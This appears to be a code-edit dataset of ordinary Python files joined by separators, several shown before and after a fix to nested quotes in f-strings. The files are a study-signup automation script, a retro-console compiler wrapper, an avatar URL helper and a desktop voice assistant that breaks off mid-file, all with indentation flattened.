from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options # for suppressing the browser
from selenium import webdriver
import warnings
from bs4 import BeautifulSoup as bs
import webbrowser
from webdriver_manager.chrome import ChromeDriverManager
options = Options()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument("--headless")
with warnings.catch_warnings():
warnings.simplefilter('ignore')
driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
# remove the options argument if u wanna see the browser open and perform the automated process
# %%
url = 'https://ucalgary.sona-systems.com'
user_ID = '<insert User ID here>'
password = '<insert Password here>'
driver.get(url)
driver.find_element(
By.ID, "ctl00_ContentPlaceHolder1_userid").send_keys(user_ID)
driver.find_element(By.ID, "pw").send_keys(password)
element = driver.find_element(
By.ID, "ctl00_ContentPlaceHolder1_default_auth_button")
driver.execute_script("arguments[0].click();", element)
WebDriverWait(driver, 10).until(EC.presence_of_element_located(
(By.ID, "lnkStudySignupLink"))).click()
# %%
html = driver.page_source
home_page = 'https://ucalgary.sona-systems.com/'
soup = bs(html, 'html.parser')
table_row = soup.find('tr').parent.findNextSibling()
study_links = table_row.findAll('a')
links = set()
for link in study_links:
links.add(f'{home_page}{link.get("href")}')
num_of_links = len(links)
if num_of_links == 0:
driver.close()
exit('\nThere are no studies available currently, see u later!')
print(f'\nthere is {num_of_links} available study') if num_of_links == 1 else print(
f'\nthere are {num_of_links} available studies')
# %%
for link in links:
driver.get(link)
already_completed = 0
link = driver.page_source
soup2 = bs(link, 'html.parser')
if len(driver.find_elements(By.ID, 'ctl00_ContentPlaceHolder1_lnkNonAdmin')) == 1:
description = soup2.find(
'span', {'id': 'ctl00_ContentPlaceHolder1_lblLongDesc'}).get_text(' ')
print(description)
if input("\nIf u wanna participate in this study, press Enter, if not, type any letter then press Enter and you will see the next avalable if there is any other") == '':
driver.find_element(
By.ID, 'ctl00_ContentPlaceHolder1_lnkNonAdmin').click()
driver.find_element(
By.ID, 'ctl00_ContentPlaceHolder1_repTimeSlots_ctl00_Submit_Button').click()
driver.find_element(
By.ID, 'ctl00_ContentPlaceHolder1_Submit_Button').click()
if driver.find_element(By.ID, 'ctl00_SystemMessageLabel').text == 'Sign-up Successful':
if input('\nYou got signed up!, press Enter if u wanna start the research study, otherwise, type any letter then press Enter') == '':
if driver.find_elements(By.ID, 'ctl00_ContentPlaceHolder1_lnkWebsite').get_attribute('href') != 0:
study_link = driver.find_element(
By.ID, 'ctl00_ContentPlaceHolder1_lnkWebsite').get_attribute('href')
driver.close()
else:
driver.close()
exit('Seems like the study is not online, if the study is actually online and you got this message please contact me so I can fix this problem')
print('\nEnjoy!')
webbrowser.open(study_link)
else:
print(
'\nYou should recieve an email anytime now with the research link, have a woderful day')
else:
print(
"Either there's a problem with the code or the sign up was unsucessful, probably the former lol, plz lmk if u got this error")
elif len(driver.find_elements(By.ID, 'ctl00_ContentPlaceHolder1_lblNonAdmin')) == 1:
already_completed += 1
driver.close()
if already_completed > 0:
print('You have already completed all of the studies available') if already_completed == num_of_links else print(
f'You have already completed {already_completed} of the studies available')
|
from functools import lru_cache
from typing import Dict, List, Optional, Set, Tuple
from collections import OrderedDict
from coreapp.models import Asm, Assembly
from coreapp import util
from coreapp.sandbox import Sandbox
from django.conf import settings
import json
import logging
import os
from pathlib import Path
import subprocess
from dataclasses import dataclass
from platform import uname
logger = logging.getLogger(__name__)
PATH: str
if settings.USE_SANDBOX_JAIL:
PATH = "/bin:/usr/bin"
else:
PATH = os.environ["PATH"]
WINE: str
if "microsoft" in uname().release.lower() and not settings.USE_SANDBOX_JAIL:
logger.info("WSL detected & nsjail disabled: wine not required.")
WINE = ""
else:
WINE = "wine"
def load_compilers() -> Dict[str, Dict[str, str]]:
ret = {}
config_json = "config.json"
compilers_base = settings.BASE_DIR / "compilers"
compiler_dirs = next(os.walk(compilers_base))
for compiler_id in compiler_dirs[1]:
config_path = Path(compilers_base / compiler_id / config_json)
if config_path.exists():
with open(config_path) as f:
try:
config = json.load(f)
except:
logger.error(f"Error: Unable to parse {config_json} for {compiler_id}")
continue
if "cc" in config and "platform" in config:
# allow binaries to exist outside of repo
binaries_path = Path(CompilerWrapper.base_path() / compiler_id)
logger.debug(f"Valid config found for {compiler_id}. Checking {binaries_path}...")
# consider compiler binaries present if *any* non-config.json file is found
binaries = (x for x in binaries_path.glob("*") if x.name != config_json)
if next(binaries, None) != None:
logger.debug(f"Enabling {compiler_id}.")
ret[compiler_id] = config
else:
logger.debug(f"No binaries for {compiler_id}, ignoring.")
else:
logger.warning(f"Error: {compiler_id} {config_json} is missing 'cc' and/or 'platform' field(s), skipping.")
return ret
@dataclass
class Platform:
name: str
description: str
arch: str
asm_prelude: str
assemble_cmd: Optional[str] = None
objdump_cmd: Optional[str] = None
nm_cmd: Optional[str] = None
@dataclass
class CompilationResult:
elf_object: bytes
errors: str
def load_platforms() -> Dict[str, Platform]:
return {
"n64": Platform(
"Nintendo 64",
"MIPS (big-endian)",
"mips",
assemble_cmd='mips-linux-gnu-as -march=vr4300 -mabi=32 -o "$OUTPUT" "$INPUT"',
objdump_cmd="mips-linux-gnu-objdump",
nm_cmd="mips-linux-gnu-nm",
asm_prelude="""
.macro .late_rodata
.section .rodata
.endm
.macro glabel label
.global \label
.type \label, @function
\label:
.endm
.macro dlabel label
.global \label
\label:
.endm
.set noat
.set noreorder
.set gp=64
"""
),
"ps1": Platform(
"PlayStation",
"MIPS (little-endian)",
"mipsel",
assemble_cmd='mips-linux-gnu-as -march=r3000 -mabi=32 -o "$OUTPUT" "$INPUT"',
objdump_cmd="mips-linux-gnu-objdump",
nm_cmd="mips-linux-gnu-nm",
asm_prelude="""
.macro .late_rodata
.section .rodata
.endm
.macro glabel label
.global \label
.type \label, @function
\label:
.endm
.set noat
.set noreorder
"""
),
"ps2": Platform(
"PlayStation 2",
"MIPS (little-endian)",
"mipsel",
assemble_cmd='mips-linux-gnu-as -march=mips64 -mabi=64 -o "$OUTPUT" "$INPUT"',
objdump_cmd="mips-linux-gnu-objdump",
nm_cmd="mips-linux-gnu-nm",
asm_prelude="""
.macro .late_rodata
.section .rodata
.endm
.macro glabel label
.global \label
.type \label, @function
\label:
.endm
.set noat
.set noreorder
"""
),
"gc_wii": Platform(
"GameCube / Wii",
"PPC",
"ppc",
assemble_cmd='powerpc-eabi-as -mgekko -o "$OUTPUT" "$INPUT"',
objdump_cmd="powerpc-eabi-objdump",
nm_cmd="powerpc-eabi-nm",
asm_prelude="""
.macro glabel label
.global \label
.type \label, @function
\label:
.endm
.set r0, 0
.set r1, 1
.set r2, 2
.set r3, 3
.set r4, 4
.set r5, 5
.set r6, 6
.set r7, 7
.set r8, 8
.set r9, 9
.set r10, 10
.set r11, 11
.set r12, 12
.set r13, 13
.set r14, 14
.set r15, 15
.set r16, 16
.set r17, 17
.set r18, 18
.set r19, 19
.set r20, 20
.set r21, 21
.set r22, 22
.set r23, 23
.set r24, 24
.set r25, 25
.set r26, 26
.set r27, 27
.set r28, 28
.set r29, 29
.set r30, 30
.set r31, 31
.set f0, 0
.set f1, 1
.set f2, 2
.set f3, 3
.set f4, 4
.set f5, 5
.set f6, 6
.set f7, 7
.set f8, 8
.set f9, 9
.set f10, 10
.set f11, 11
.set f12, 12
.set f13, 13
.set f14, 14
.set f15, 15
.set f16, 16
.set f17, 17
.set f18, 18
.set f19, 19
.set f20, 20
.set f21, 21
.set f22, 22
.set f23, 23
.set f24, 24
.set f25, 25
.set f26, 26
.set f27, 27
.set f28, 28
.set f29, 29
.set f30, 30
.set f31, 31
.set qr0, 0
.set qr1, 1
.set qr2, 2
.set qr3, 3
.set qr4, 4
.set qr5, 5
.set qr6, 6
.set qr7, 7
"""
),
}
def get_assemble_cmd(platform: str) -> Optional[str]:
if platform in _platforms:
return _platforms[platform].assemble_cmd
return None
def get_nm_command(platform: str) -> Optional[str]:
if platform in _platforms:
return _platforms[platform].nm_cmd
return None
def get_objdump_command(platform: str) -> Optional[str]:
if platform in _platforms:
return _platforms[platform].objdump_cmd
return None
def _check_assembly_cache(*args: str) -> Tuple[Optional[Assembly], str]:
hash = util.gen_hash(args)
return Assembly.objects.filter(hash=hash).first(), hash
class CompilerWrapper:
@staticmethod
def base_path() -> Path:
return settings.COMPILER_BASE_PATH
@staticmethod
def platform_from_compiler(compiler: str) -> Optional[str]:
cfg = _compilers.get(compiler)
return cfg.get("platform") if cfg else None
@staticmethod
def arch_from_platform(platform: str) -> Optional[str]:
plt = _platforms.get(platform)
return plt.arch if plt else None
@staticmethod
def available_compiler_ids() -> List[str]:
return sorted(_compilers.keys())
@staticmethod
def available_compilers() -> Dict[str, Dict[str, Optional[str]]]:
return {k: {"platform": CompilerWrapper.platform_from_compiler(k)} for k in CompilerWrapper.available_compiler_ids()}
@staticmethod
def available_platforms() -> OrderedDict[str, Dict[str, str]]:
a_set: Set[str] = set()
ret = OrderedDict()
for id in CompilerWrapper.available_compiler_ids():
a_set.add(_compilers[id]["platform"])
for a in sorted(a_set):
ret[a] = {
"name": _platforms[a].name,
"description": _platforms[a].description,
"arch": _platforms[a].arch,
}
return ret
@staticmethod
def filter_compiler_flags(compiler: str, compiler_flags: str) -> str:
cfg = _compilers[compiler]
# Remove irrelevant flags that are part of the base compiler configs or
# don't affect matching, but clutter the compiler settings field.
# TODO: use cfg for this?
skip_flags_with_args = {
"-woff",
"-B",
"-I",
"-D",
"-U",
"-G",
}
skip_flags = {
"-ffreestanding",
"-non_shared",
"-Xcpluscomm",
"-Xfullwarn",
"-fullwarn",
"-Wab,-r4300_mul",
"-c",
"-w",
}
skip_next = False
flags = []
for flag in compiler_flags.split():
if skip_next:
skip_next = False
continue
if flag in skip_flags:
continue
if flag in skip_flags_with_args:
skip_next = True
continue
if any(flag.startswith(f) for f in skip_flags_with_args):
continue
flags.append(flag)
return " ".join(flags)
@staticmethod
@lru_cache(maxsize=settings.COMPILATION_CACHE_SIZE) # type: ignore
def compile_code(compiler: str, compiler_flags: str, code: str, context: str) -> CompilationResult:
if compiler not in _compilers:
logger.debug(f"Compiler {compiler} not found")
return CompilationResult(b'', "ERROR: Compiler not found")
code = code.replace("\r\n", "\n")
context = context.replace("\r\n", "\n")
with Sandbox() as sandbox:
code_path = sandbox.path / "code.c"
object_path = sandbox.path / "object.o"
with code_path.open("w") as f:
f.write('#line 1 "ctx.c"\n')
f.write(context)
f.write('\n')
f.write('#line 1 "src.c"\n')
f.write(code)
f.write('\n')
compiler_path = CompilerWrapper.base_path() / compiler
# Run compiler
try:
compile_proc = sandbox.run_subprocess(
_compilers[compiler]["cc"],
mounts=[compiler_path],
shell=True,
env={
"PATH": PATH,
"WINE": WINE,
"INPUT": sandbox.rewrite_path(code_path),
"OUTPUT": sandbox.rewrite_path(object_path),
"COMPILER_DIR": sandbox.rewrite_path(compiler_path),
"COMPILER_FLAGS": sandbox.quote_options(compiler_flags),
"MWCIncludes": "/tmp",
})
except subprocess.CalledProcessError as e:
# Compilation failed
logging.debug("Compilation failed: " + e.stderr)
return CompilationResult(b'', e.stderr)
if not object_path.exists():
logger.error("Compiler did not create an object file")
return CompilationResult(b'', "ERROR: Compiler did not create an object file")
return CompilationResult(object_path.read_bytes(), compile_proc.stderr)
@staticmethod
def assemble_asm(platform: str, asm: Asm, to_regenerate: Optional[Assembly] = None) -> Tuple[Optional[Assembly], Optional[str]]:
if platform not in _platforms:
logger.error(f"Platform {platform} not found")
return (None, f"Platform {platform} not found")
assemble_cmd = get_assemble_cmd(platform)
if not assemble_cmd:
logger.error(f"Assemble command for platform {platform} not found")
return (None, f"Assemble command for platform {platform} not found")
# Use the cache if we're not manually re-running an Assembly
if not to_regenerate:
cached_assembly, hash = _check_assembly_cache(platform, asm.hash)
if cached_assembly:
logger.debug(f"Assembly cache hit! hash: {hash}")
return (cached_assembly, None)
platform_cfg = _platforms[platform]
with Sandbox() as sandbox:
asm_path = sandbox.path / "asm.s"
asm_path.write_text(platform_cfg.asm_prelude + asm.data)
object_path = sandbox.path / "object.o"
# Run assembler
try:
assemble_proc = sandbox.run_subprocess(
platform_cfg.assemble_cmd,
mounts=[],
shell=True,
env={
"PATH": PATH,
"INPUT": sandbox.rewrite_path(asm_path),
"OUTPUT": sandbox.rewrite_path(object_path),
})
except subprocess.CalledProcessError as e:
# Compilation failed
logger.exception("Error running asm-differ")
return (None, e.stderr)
# Assembly failed
if assemble_proc.returncode != 0:
return (None, assemble_proc.stderr)
if not object_path.exists():
logger.error("Assembler did not create an object file")
return (None, "Assembler did not create an object file")
if to_regenerate:
assembly = to_regenerate
assembly.elf_object = object_path.read_bytes()
else:
assembly = Assembly(
hash=hash,
arch=platform_cfg.arch,
source_asm=asm,
elf_object=object_path.read_bytes(),
)
assembly.save()
return (assembly, None)
_compilers = load_compilers()
logger.info(f"Found {len(_compilers)} compiler(s): {", ".join(_compilers.keys())}")
_platforms = load_platforms()
logger.info(f"Available platform(s): {", ".join(CompilerWrapper.available_platforms().keys())}")
| from functools import lru_cache
from typing import Dict, List, Optional, Set, Tuple
from collections import OrderedDict
from coreapp.models import Asm, Assembly
from coreapp import util
from coreapp.sandbox import Sandbox
from django.conf import settings
import json
import logging
import os
from pathlib import Path
import subprocess
from dataclasses import dataclass
from platform import uname
logger = logging.getLogger(__name__)
PATH: str
if settings.USE_SANDBOX_JAIL:
PATH = "/bin:/usr/bin"
else:
PATH = os.environ["PATH"]
WINE: str
if "microsoft" in uname().release.lower() and not settings.USE_SANDBOX_JAIL:
logger.info("WSL detected & nsjail disabled: wine not required.")
WINE = ""
else:
WINE = "wine"
def load_compilers() -> Dict[str, Dict[str, str]]:
ret = {}
config_json = "config.json"
compilers_base = settings.BASE_DIR / "compilers"
compiler_dirs = next(os.walk(compilers_base))
for compiler_id in compiler_dirs[1]:
config_path = Path(compilers_base / compiler_id / config_json)
if config_path.exists():
with open(config_path) as f:
try:
config = json.load(f)
except:
logger.error(f"Error: Unable to parse {config_json} for {compiler_id}")
continue
if "cc" in config and "platform" in config:
# allow binaries to exist outside of repo
binaries_path = Path(CompilerWrapper.base_path() / compiler_id)
logger.debug(f"Valid config found for {compiler_id}. Checking {binaries_path}...")
# consider compiler binaries present if *any* non-config.json file is found
binaries = (x for x in binaries_path.glob("*") if x.name != config_json)
if next(binaries, None) != None:
logger.debug(f"Enabling {compiler_id}.")
ret[compiler_id] = config
else:
logger.debug(f"No binaries for {compiler_id}, ignoring.")
else:
logger.warning(f"Error: {compiler_id} {config_json} is missing 'cc' and/or 'platform' field(s), skipping.")
return ret
@dataclass
class Platform:
name: str
description: str
arch: str
asm_prelude: str
assemble_cmd: Optional[str] = None
objdump_cmd: Optional[str] = None
nm_cmd: Optional[str] = None
@dataclass
class CompilationResult:
elf_object: bytes
errors: str
def load_platforms() -> Dict[str, Platform]:
return {
"n64": Platform(
"Nintendo 64",
"MIPS (big-endian)",
"mips",
assemble_cmd='mips-linux-gnu-as -march=vr4300 -mabi=32 -o "$OUTPUT" "$INPUT"',
objdump_cmd="mips-linux-gnu-objdump",
nm_cmd="mips-linux-gnu-nm",
asm_prelude="""
.macro .late_rodata
.section .rodata
.endm
.macro glabel label
.global \label
.type \label, @function
\label:
.endm
.macro dlabel label
.global \label
\label:
.endm
.set noat
.set noreorder
.set gp=64
"""
),
"ps1": Platform(
"PlayStation",
"MIPS (little-endian)",
"mipsel",
assemble_cmd='mips-linux-gnu-as -march=r3000 -mabi=32 -o "$OUTPUT" "$INPUT"',
objdump_cmd="mips-linux-gnu-objdump",
nm_cmd="mips-linux-gnu-nm",
asm_prelude="""
.macro .late_rodata
.section .rodata
.endm
.macro glabel label
.global \label
.type \label, @function
\label:
.endm
.set noat
.set noreorder
"""
),
"ps2": Platform(
"PlayStation 2",
"MIPS (little-endian)",
"mipsel",
assemble_cmd='mips-linux-gnu-as -march=mips64 -mabi=64 -o "$OUTPUT" "$INPUT"',
objdump_cmd="mips-linux-gnu-objdump",
nm_cmd="mips-linux-gnu-nm",
asm_prelude="""
.macro .late_rodata
.section .rodata
.endm
.macro glabel label
.global \label
.type \label, @function
\label:
.endm
.set noat
.set noreorder
"""
),
"gc_wii": Platform(
"GameCube / Wii",
"PPC",
"ppc",
assemble_cmd='powerpc-eabi-as -mgekko -o "$OUTPUT" "$INPUT"',
objdump_cmd="powerpc-eabi-objdump",
nm_cmd="powerpc-eabi-nm",
asm_prelude="""
.macro glabel label
.global \label
.type \label, @function
\label:
.endm
.set r0, 0
.set r1, 1
.set r2, 2
.set r3, 3
.set r4, 4
.set r5, 5
.set r6, 6
.set r7, 7
.set r8, 8
.set r9, 9
.set r10, 10
.set r11, 11
.set r12, 12
.set r13, 13
.set r14, 14
.set r15, 15
.set r16, 16
.set r17, 17
.set r18, 18
.set r19, 19
.set r20, 20
.set r21, 21
.set r22, 22
.set r23, 23
.set r24, 24
.set r25, 25
.set r26, 26
.set r27, 27
.set r28, 28
.set r29, 29
.set r30, 30
.set r31, 31
.set f0, 0
.set f1, 1
.set f2, 2
.set f3, 3
.set f4, 4
.set f5, 5
.set f6, 6
.set f7, 7
.set f8, 8
.set f9, 9
.set f10, 10
.set f11, 11
.set f12, 12
.set f13, 13
.set f14, 14
.set f15, 15
.set f16, 16
.set f17, 17
.set f18, 18
.set f19, 19
.set f20, 20
.set f21, 21
.set f22, 22
.set f23, 23
.set f24, 24
.set f25, 25
.set f26, 26
.set f27, 27
.set f28, 28
.set f29, 29
.set f30, 30
.set f31, 31
.set qr0, 0
.set qr1, 1
.set qr2, 2
.set qr3, 3
.set qr4, 4
.set qr5, 5
.set qr6, 6
.set qr7, 7
"""
),
}
def get_assemble_cmd(platform: str) -> Optional[str]:
if platform in _platforms:
return _platforms[platform].assemble_cmd
return None
def get_nm_command(platform: str) -> Optional[str]:
if platform in _platforms:
return _platforms[platform].nm_cmd
return None
def get_objdump_command(platform: str) -> Optional[str]:
if platform in _platforms:
return _platforms[platform].objdump_cmd
return None
def _check_assembly_cache(*args: str) -> Tuple[Optional[Assembly], str]:
hash = util.gen_hash(args)
return Assembly.objects.filter(hash=hash).first(), hash
class CompilerWrapper:
@staticmethod
def base_path() -> Path:
return settings.COMPILER_BASE_PATH
@staticmethod
def platform_from_compiler(compiler: str) -> Optional[str]:
cfg = _compilers.get(compiler)
return cfg.get("platform") if cfg else None
@staticmethod
def arch_from_platform(platform: str) -> Optional[str]:
plt = _platforms.get(platform)
return plt.arch if plt else None
@staticmethod
def available_compiler_ids() -> List[str]:
return sorted(_compilers.keys())
@staticmethod
def available_compilers() -> Dict[str, Dict[str, Optional[str]]]:
return {k: {"platform": CompilerWrapper.platform_from_compiler(k)} for k in CompilerWrapper.available_compiler_ids()}
@staticmethod
def available_platforms() -> OrderedDict[str, Dict[str, str]]:
a_set: Set[str] = set()
ret = OrderedDict()
for id in CompilerWrapper.available_compiler_ids():
a_set.add(_compilers[id]["platform"])
for a in sorted(a_set):
ret[a] = {
"name": _platforms[a].name,
"description": _platforms[a].description,
"arch": _platforms[a].arch,
}
return ret
@staticmethod
def filter_compiler_flags(compiler: str, compiler_flags: str) -> str:
cfg = _compilers[compiler]
# Remove irrelevant flags that are part of the base compiler configs or
# don't affect matching, but clutter the compiler settings field.
# TODO: use cfg for this?
skip_flags_with_args = {
"-woff",
"-B",
"-I",
"-D",
"-U",
"-G",
}
skip_flags = {
"-ffreestanding",
"-non_shared",
"-Xcpluscomm",
"-Xfullwarn",
"-fullwarn",
"-Wab,-r4300_mul",
"-c",
"-w",
}
skip_next = False
flags = []
for flag in compiler_flags.split():
if skip_next:
skip_next = False
continue
if flag in skip_flags:
continue
if flag in skip_flags_with_args:
skip_next = True
continue
if any(flag.startswith(f) for f in skip_flags_with_args):
continue
flags.append(flag)
return " ".join(flags)
@staticmethod
@lru_cache(maxsize=settings.COMPILATION_CACHE_SIZE) # type: ignore
def compile_code(compiler: str, compiler_flags: str, code: str, context: str) -> CompilationResult:
if compiler not in _compilers:
logger.debug(f"Compiler {compiler} not found")
return CompilationResult(b'', "ERROR: Compiler not found")
code = code.replace("\r\n", "\n")
context = context.replace("\r\n", "\n")
with Sandbox() as sandbox:
code_path = sandbox.path / "code.c"
object_path = sandbox.path / "object.o"
with code_path.open("w") as f:
f.write('#line 1 "ctx.c"\n')
f.write(context)
f.write('\n')
f.write('#line 1 "src.c"\n')
f.write(code)
f.write('\n')
compiler_path = CompilerWrapper.base_path() / compiler
# Run compiler
try:
compile_proc = sandbox.run_subprocess(
_compilers[compiler]["cc"],
mounts=[compiler_path],
shell=True,
env={
"PATH": PATH,
"WINE": WINE,
"INPUT": sandbox.rewrite_path(code_path),
"OUTPUT": sandbox.rewrite_path(object_path),
"COMPILER_DIR": sandbox.rewrite_path(compiler_path),
"COMPILER_FLAGS": sandbox.quote_options(compiler_flags),
"MWCIncludes": "/tmp",
})
except subprocess.CalledProcessError as e:
# Compilation failed
logging.debug("Compilation failed: " + e.stderr)
return CompilationResult(b'', e.stderr)
if not object_path.exists():
logger.error("Compiler did not create an object file")
return CompilationResult(b'', "ERROR: Compiler did not create an object file")
return CompilationResult(object_path.read_bytes(), compile_proc.stderr)
@staticmethod
def assemble_asm(platform: str, asm: Asm, to_regenerate: Optional[Assembly] = None) -> Tuple[Optional[Assembly], Optional[str]]:
if platform not in _platforms:
logger.error(f"Platform {platform} not found")
return (None, f"Platform {platform} not found")
assemble_cmd = get_assemble_cmd(platform)
if not assemble_cmd:
logger.error(f"Assemble command for platform {platform} not found")
return (None, f"Assemble command for platform {platform} not found")
# Use the cache if we're not manually re-running an Assembly
if not to_regenerate:
cached_assembly, hash = _check_assembly_cache(platform, asm.hash)
if cached_assembly:
logger.debug(f"Assembly cache hit! hash: {hash}")
return (cached_assembly, None)
platform_cfg = _platforms[platform]
with Sandbox() as sandbox:
asm_path = sandbox.path / "asm.s"
asm_path.write_text(platform_cfg.asm_prelude + asm.data)
object_path = sandbox.path / "object.o"
# Run assembler
try:
assemble_proc = sandbox.run_subprocess(
platform_cfg.assemble_cmd,
mounts=[],
shell=True,
env={
"PATH": PATH,
"INPUT": sandbox.rewrite_path(asm_path),
"OUTPUT": sandbox.rewrite_path(object_path),
})
except subprocess.CalledProcessError as e:
# Compilation failed
logger.exception("Error running asm-differ")
return (None, e.stderr)
# Assembly failed
if assemble_proc.returncode != 0:
return (None, assemble_proc.stderr)
if not object_path.exists():
logger.error("Assembler did not create an object file")
return (None, "Assembler did not create an object file")
if to_regenerate:
assembly = to_regenerate
assembly.elf_object = object_path.read_bytes()
else:
assembly = Assembly(
hash=hash,
arch=platform_cfg.arch,
source_asm=asm,
elf_object=object_path.read_bytes(),
)
assembly.save()
return (assembly, None)
_compilers = load_compilers()
logger.info(f"Found {len(_compilers)} compiler(s): {', '.join(_compilers.keys())}")
_platforms = load_platforms()
logger.info(f"Available platform(s): {', '.join(CompilerWrapper.available_platforms().keys())}")
|
from zlib import crc32
import requests
class Avacat:
def __init__(self, root='https://shantichat.github.io/avacats'):
self.root = root
self.info = requests.get(f'{root}/index.json').json()
def __call__(self, name, size):
assert size in self.info['sizes'], f"Size {size} not allowed, available sizes: {self.info["sizes"]}"
i = crc32(name.lower().encode()) % self.info['num']
return f'{self.root}{size}x{size}/{i}.jpg'
if __name__ == '__main__':
avacat = Avacat()
print(avacat('alice@example.com', 80)) # https://shantichat.github.io/avacats80x80/171.jpg
print(avacat('bob@example.com', 120)) # https://shantichat.github.io/avacats120x120/222.jpg
| from zlib import crc32
import requests
class Avacat:
def __init__(self, root='https://shantichat.github.io/avacats'):
self.root = root
self.info = requests.get(f'{root}/index.json').json()
def __call__(self, name, size):
assert size in self.info['sizes'], f"Size {size} not allowed, available sizes: {self.info['sizes']}"
i = crc32(name.lower().encode()) % self.info['num']
return f'{self.root}{size}x{size}/{i}.jpg'
if __name__ == '__main__':
avacat = Avacat()
print(avacat('alice@example.com', 80)) # https://shantichat.github.io/avacats80x80/171.jpg
print(avacat('bob@example.com', 120)) # https://shantichat.github.io/avacats120x120/222.jpg
|
from __future__ import print_function
import pyttsx3
import datetime
import smtplib
import speech_recognition as sr
import wikipedia
import webbrowser
import os
import random
from twilio.rest import Client
import pickle
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import requests
import json
from decouple import config
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id)
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/contacts.readonly']
def speak(audio):
# It speaks a given string
engine.say(audio)
engine.runAndWait()
def wishMe():
# Wish according to the time.
hour = int(datetime.datetime.now().hour)
if 0 <= hour < 12:
speak("Good Morning!")
elif 12 <= hour < 18:
speak("Good Afternoon!")
elif 18 <= hour < 23:
speak("Good Evening!")
else:
speak(
"Good Night, sir...It's good for health to have dinner and go to bed now...as you know Early to bed and "
"early to rise, makes a man healthy, wealthy and wise.")
speak("Thanks for using Era")
exit()
speak("I'm Era, your personal voice assistant. Please tell how may I help you?")
def sendEmail(to, content):
# It sends an email
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login('your_email@gmail.com',
'your_password') # Enter your password
server.sendmail('your_email@gmail.com', to, content)
server.close()
def fetchSecret():
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
return build('people', 'v1', credentials=creds)
def fetchNameEmail():
"""Fetches name and their email ids from google contacts"""
# Calls our function to retrieve our secret
service = fetchSecret()
# Call the People API
results = service.people().connections().list(
resourceName='people/me',
pageSize=1500,
personFields='names,emailAddresses').execute()
connections = results.get('connections', [])
name1List = []
emailList = []
for person in connections:
names = person.get('names', [])
emails = person.get('emailAddresses', [])
if names and emails:
name = names[0].get('displayName')
name1List.append(name)
email = emails[0]['value']
emailList.append(email)
nameEmailList = zip(name1List, emailList)
return sorted(nameEmailList, key=lambda x: x[0])
def name1Lower(name1List):
"""Makes all the names lowercase for name-email id list"""
name1ListLower = list(map(lambda x: x.lower(), name1List))
return list(map(lambda x: x.split(), name1ListLower))
def fetchNamePhoneNo():
"""Fetches name and their phone numbers from google contacts"""
# Calls our function to retrieve our secret
service = fetchSecret()
# Call the People API
results = service.people().connections().list(
resourceName='people/me',
pageSize=1500,
personFields='names,emailAddresses,phoneNumbers').execute()
connections = results.get('connections', [])
name2List = []
phoneNoList = []
for person in connections:
names = person.get('names', [])
phones = person.get('phoneNumbers', [])
if phones:
name = names[0].get('displayName')
name2List.append(name)
phone = phones[0]['value']
phoneNoList.append(phone)
namePhoneNoList = zip(name2List, phoneNoList)
return sorted(namePhoneNoList, key=lambda x: x[0])
def name2Lower(name2List):
"""Makes all the names lowercase for name-phone number list"""
name2ListLower = list(map(lambda x: x.lower(), name2List))
return list(map(lambda x: x.split(), name2ListLower))
def queryLowerSplit(query):
"""Makes all the query elements lowercase"""
queryLower = query.lower()
return queryLower.split()
def takeCommand():
# It takes microphone input from user and returns string output
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.adjust_for_ambient_noise(source)
r.pause_threshold = 1
audio = r.listen(source,
phrase_time_limit=4) # it converts the audio input into string and gives a span of 4 sec to an user to speak
try:
print("Recognizing...")
query = r.recognize_google(audio, language='en-in')
# query = r.recognize_sphinx(audio) #instead of that we can use this is offline but accuray very poor
print(f"User said: {query}")
except:
print("Say that again please...")
return "None"
return query
# Commenting out function since its not being used.
# def splitWords(query):
# return lst[0].split()
def givenews():
news_api = config('News_API')
speak("News for today..Lets begin")
url = f"http://newsapi.org/v2/top-headlines?country=in&apiKey={news_api}"
news = requests.get(url).text
news_dict = json.loads(news)
arts = news_dict['articles']
i = 1
for article in arts[:-1]:
speak(article['title'])
print(f"\n{i}. {article["title"]}")
speak("Moving on to the next news....")
i += 1
for article in arts[-1:]:
speak(article['title'])
print(f"\n{i}. {article["title"]}")
speak("Thanks for listening...")
speak("Stay tuned for more updated news")
if __name__ == '__main__':
wishMe()
while True:
# if 1:
query = takeCommand().lower()
# Logic for executing tasks based on query
if "how are you" in query:
speak("I'm fine sir, what about you?")
elif "fine" in query:
speak("It's good to know that you are fine.")
elif "who are you" in query:
speak("My name is Era. I'm a desktop assistant made by Mr Aritra.")
elif 'wikipedia' in query:
# sentences=2 means return first two string
results = wikipedia.summary(query, sentences=2)
speak("According to wikipedia..")
# print("According to wikipedia")
# print(results)
speak(results)
elif 'open spartan' in query or 'spartan' in query:
spartanPath = "C:\\Program Files\\Wavefunction\\Spartan14v114\\WF14gui64.exe"
os.startfile(spartanPath)
elif 'open youtube' in query:
webbrowser.open('http://www.youtube.com')
elif 'open google' in query:
webbrowser.open('https://www.google.co.in/')
elif 'open stackoverflow' in query:
webbrowser.open('https://stackoverflow.com/')
elif 'play music' in query or 'play song' in query or 'play some music' in query or 'play another music' in query or 'change song' in query or 'next song' in query:
music_dir = 'G:\\RabindraSangeet'
songs = os.listdir(music_dir)
os.startfile(os.path.join(
music_dir, songs[random.randint(0, len(songs) - 1)]))
elif 'the time' in query or 'time' in query:
strTime = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"Sir, the time is {strTime}")
elif 'open code' in query or 'open visual studio' in query:
